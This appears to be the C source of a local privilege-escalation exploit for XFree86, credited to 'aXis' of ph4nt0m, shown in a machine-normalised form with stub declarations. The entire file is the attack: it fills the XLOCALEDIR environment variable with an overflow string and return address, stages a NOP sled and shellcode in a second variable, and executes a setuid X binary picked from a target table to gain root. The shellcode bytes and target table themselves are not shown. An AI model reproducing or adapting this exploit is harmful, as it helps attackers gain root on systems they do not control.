
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* dest; int num; char* version; int bufsize; unsigned long ret; int name; } ;


 int atoi (int ) ;
 int execl (char*,int ,int ) ;
 int exit (int) ;
 TYPE_1__* exploit ;
 int fprintf (int ,char*,...) ;
 int getopt (int,char**,char*) ;
 int memcpy (char*,unsigned long*,int) ;
 int memset (char*,int,int) ;
 int optarg ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 unsigned long* shellcode ;
 int stderr ;
 int strlen (unsigned long*) ;
 int usage (char*) ;

int main(int argc, char **argv){
  char buf[4076];
  int i;
  int type;
  int options;
  int size;
  unsigned long ret;


  while((options=getopt(argc,argv,"ht:"))!=-1){
    switch(options){
       case 'h':
  usage(argv[0]);
         exit(0);
       case 't':
         type=atoi(optarg);

         if(type>6||type<0){
           printf("Wrong Target!\n\n");
           exit(0);

         }

         if(type==0){
    usage(argv[0]);
           printf("Please select target num !\n");
           printf("======================================\n");
           for(i=0;exploit[i].dest;i++)
           fprintf(stderr,"[%d]  | %s  %s  \n",exploit[i].num,exploit[i].version,exploit[i].dest);
      exit(1);


         }
  break;
    default:
      usage(argv[0]);
      exit(0);

     }

  }

  size=exploit[type-1].bufsize;
  ret=exploit[type-1].ret;


  memset(buf,0x41,4072);
  memcpy(buf+2076,&ret,0x4);
  setenv("XLOCALEDIR",buf,1);


  memset(buf,0x90,size);
  memcpy(buf+4000+i,shellcode,strlen(shellcode));
  setenv("PH4NT0M",buf,1);


  printf("\n++++++++++++++++++++++++++++++\n");
  printf("Xfree86 XLOCALEDIR env local root exploit\n");
  printf("++++++++++++++++++++++++++++++++\n\n");
  printf("coded by aXis,aXis@ph4nt0m.net\n");
  printf("PST,www.ph4nt0m.org\n\n");
  printf("retaddr is at 0x%lx  \n",ret);
  printf("buf is at 0x%lx \n",&buf);

  if(execl((exploit[type-1].dest),(exploit[type-1].name),0)==-1){
    fprintf(stderr,"failed,try another target! -h for help\n\n");
      exit(-1);
  }

  return 0;
}
